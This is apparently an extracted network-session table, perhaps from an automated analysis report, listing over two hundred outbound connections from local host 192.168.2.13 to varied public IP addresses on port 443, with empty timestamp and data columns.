                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15290192.168.2.133329693.208.226.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15291192.168.2.1357730111.131.44.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15292192.168.2.1343716181.182.223.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15293192.168.2.1337124159.172.208.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15294192.168.2.1340426163.159.34.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15295192.168.2.1343936132.247.169.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15296192.168.2.1341248196.12.50.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15297192.168.2.1347356101.198.68.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15298192.168.2.1357612102.0.192.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15299192.168.2.1347206212.70.47.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15300192.168.2.1358012115.120.134.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15301192.168.2.1334628144.5.129.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15302192.168.2.1344884120.120.146.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15303192.168.2.1354870138.84.170.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15304192.168.2.135326886.249.53.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15305192.168.2.1344186115.113.94.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15306192.168.2.135614636.183.215.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15307192.168.2.1356556204.176.52.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15308192.168.2.1357342174.53.78.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15309192.168.2.1344250174.132.244.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15310192.168.2.134368646.190.102.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15311192.168.2.1348254104.173.157.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15312192.168.2.1340506170.51.35.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15313192.168.2.1349710192.179.217.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15314192.168.2.135085043.135.214.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15315192.168.2.135972057.82.162.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15316192.168.2.135640881.134.101.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15317192.168.2.134498637.114.126.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15318192.168.2.1350970212.139.224.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15319192.168.2.1347202191.234.165.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15320192.168.2.1352450170.229.73.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15321192.168.2.1342520182.24.238.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15322192.168.2.1346268184.95.44.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15323192.168.2.1333220198.38.166.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15324192.168.2.135655044.242.28.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15325192.168.2.1349170203.116.6.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15326192.168.2.133687688.131.101.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15327192.168.2.1358612125.160.152.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15328192.168.2.1333364192.237.29.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15329192.168.2.133292225.151.18.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15330192.168.2.134584673.188.41.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15331192.168.2.1346784110.44.18.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15332192.168.2.133732079.215.200.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15333192.168.2.135459846.68.193.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15334192.168.2.133620245.135.191.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15335192.168.2.1341072151.208.161.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15336192.168.2.1349380213.233.195.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15337192.168.2.134922648.198.208.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15338192.168.2.1334730168.76.239.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15339192.168.2.1344594143.234.229.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15340192.168.2.1348988216.82.152.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15341192.168.2.136024665.188.214.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15342192.168.2.133579824.201.12.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15343192.168.2.135481480.197.221.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15344192.168.2.1346998206.200.0.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15345192.168.2.1359904184.231.166.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15346192.168.2.133454236.166.35.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15347192.168.2.134233419.132.10.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15348192.168.2.134268025.47.197.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15349192.168.2.1348448176.72.23.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15350192.168.2.1352624181.109.94.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15351192.168.2.1353718202.37.143.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15352192.168.2.133355288.232.33.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15353192.168.2.1353076143.123.111.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15354192.168.2.1358446144.168.189.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15355192.168.2.1348928111.62.132.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15356192.168.2.1345802201.138.113.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15357192.168.2.135852617.172.36.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15358192.168.2.133837266.220.18.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15359192.168.2.134986281.120.60.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15360192.168.2.135646652.183.180.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15361192.168.2.1355986140.186.58.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15362192.168.2.1344650154.126.55.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15363192.168.2.1336420113.198.173.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15364192.168.2.1343068146.218.109.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15365192.168.2.133295644.254.90.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15366192.168.2.1348648211.87.58.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15367192.168.2.133881240.183.134.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15368192.168.2.135047485.161.103.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15369192.168.2.135889632.23.144.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15370192.168.2.134556243.73.125.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15371192.168.2.134164298.118.11.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15372192.168.2.1357114170.131.118.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15373192.168.2.1349822217.107.171.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15374192.168.2.1342378180.65.135.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15375192.168.2.1351436101.173.50.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15376192.168.2.1347882130.71.109.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15377192.168.2.1337064103.74.192.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15378192.168.2.135059675.16.102.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15379192.168.2.133420285.74.255.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15380192.168.2.134837862.164.152.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15381192.168.2.133327249.109.216.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15382192.168.2.133952645.12.90.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15383192.168.2.1346394103.157.121.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15384192.168.2.1335654221.194.26.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15385192.168.2.134828659.73.75.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15386192.168.2.1338946168.37.27.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15387192.168.2.1352572219.16.4.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15388192.168.2.1346026211.153.14.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15389192.168.2.1353688201.158.171.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15390192.168.2.1342348206.159.7.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15391192.168.2.1335606188.148.195.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15392192.168.2.1351842116.83.37.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15393192.168.2.133639817.235.3.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15394192.168.2.135797617.123.57.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15395192.168.2.135703614.214.59.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15396192.168.2.1339358170.42.116.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15397192.168.2.135356636.58.209.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15398192.168.2.135166214.92.16.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15399192.168.2.1356860104.216.239.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15400192.168.2.1352470192.160.180.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15401192.168.2.1359750103.106.251.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15402192.168.2.13555041.48.157.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15403192.168.2.135202467.38.241.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15404192.168.2.1344714187.66.19.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15405192.168.2.134980042.3.46.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15406192.168.2.136041839.27.152.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15407192.168.2.1344280123.220.221.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15408192.168.2.133380843.53.121.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15409192.168.2.133904857.207.117.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15410192.168.2.1338680100.233.218.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15411192.168.2.1333770120.17.253.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15412192.168.2.1357722174.164.149.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15413192.168.2.134769879.79.44.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15414192.168.2.1351176138.138.188.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15415192.168.2.1332878112.132.103.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15416192.168.2.1342618171.64.167.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15417192.168.2.1339044192.229.104.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15418192.168.2.1335150205.166.180.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15419192.168.2.1347050132.86.124.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15420192.168.2.1359138155.199.225.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15421192.168.2.135008682.129.87.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15422192.168.2.1357984160.20.106.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15423192.168.2.1334590185.99.251.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15424192.168.2.1357860204.200.232.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15425192.168.2.1350416140.166.83.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15426192.168.2.1352848107.25.251.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15427192.168.2.1352042133.208.192.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15428192.168.2.1350300124.114.33.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15429192.168.2.135842013.148.196.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15430192.168.2.1349600172.13.223.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15431192.168.2.1360896196.17.131.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15432192.168.2.1337690174.238.74.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15433192.168.2.133639042.62.245.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15434192.168.2.1347350217.120.232.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15435192.168.2.1356840198.60.141.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15436192.168.2.1337474182.138.114.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15437192.168.2.1354678132.38.234.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15438192.168.2.133641618.166.37.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15439192.168.2.1337082201.215.7.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15440192.168.2.1342474147.207.96.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15441192.168.2.1355818168.95.21.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15442192.168.2.1360244218.10.48.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15443192.168.2.133688213.114.101.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15444192.168.2.134786896.216.216.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15445192.168.2.135443840.230.237.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15446192.168.2.1341320140.247.95.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15447192.168.2.134013425.121.126.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15448192.168.2.13545521.186.24.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15449192.168.2.133667896.70.6.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15450192.168.2.1360710111.101.199.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15451192.168.2.1335680129.4.238.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15452192.168.2.133810898.48.102.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15453192.168.2.1334778129.7.29.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15454192.168.2.1357360147.42.99.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15455192.168.2.133676238.29.225.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15456192.168.2.1348244180.212.112.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15457192.168.2.1355572116.28.226.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15458192.168.2.134035262.167.85.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15459192.168.2.1335164198.145.33.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15460192.168.2.1340856206.230.94.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15461192.168.2.1349016197.251.210.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15462192.168.2.1356216133.159.133.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15463192.168.2.134827888.59.61.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15464192.168.2.1356894133.36.109.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15465192.168.2.1359334157.226.68.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15466192.168.2.134162231.11.206.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15467192.168.2.1344684165.177.164.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15468192.168.2.135557278.212.115.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15469192.168.2.133281057.85.107.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15470192.168.2.1358828146.131.24.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15471192.168.2.1358468156.147.123.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15472192.168.2.133363836.165.32.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15473192.168.2.1342600107.187.237.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15474192.168.2.134282462.64.137.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15475192.168.2.1349612178.130.92.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15476192.168.2.134920245.24.208.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15477192.168.2.135467235.188.113.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15478192.168.2.1353668188.12.112.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15479192.168.2.134055025.18.39.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15480192.168.2.1359068150.75.141.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15481192.168.2.1333882106.104.76.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15482192.168.2.133757247.111.215.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15483192.168.2.13544488.154.91.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15484192.168.2.135821038.220.126.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15485192.168.2.1336722119.168.242.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15486192.168.2.134106699.49.81.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15487192.168.2.134479284.107.95.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15488192.168.2.1350044199.74.66.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15489192.168.2.134574887.80.41.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15490192.168.2.134988090.199.95.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15491192.168.2.1346062171.121.61.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15492192.168.2.134639441.31.154.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15493192.168.2.1351264171.82.202.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15494192.168.2.1360600178.210.104.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15495192.168.2.134516036.207.26.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15496192.168.2.1360266107.85.176.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15497192.168.2.1339444200.84.163.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15498192.168.2.1351106143.88.172.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15499192.168.2.1343928202.36.101.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15500192.168.2.1359054157.246.140.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15501192.168.2.1336240221.7.50.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15502192.168.2.1342316101.59.155.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15503192.168.2.1350940112.10.165.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15504192.168.2.1358926198.138.20.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15505192.168.2.134829434.89.188.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15506192.168.2.134437662.194.93.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15507192.168.2.134276472.21.31.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15508192.168.2.1350376158.114.33.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15509192.168.2.1334742144.4.84.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15510192.168.2.134118419.236.141.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15511192.168.2.1358160179.137.131.224443
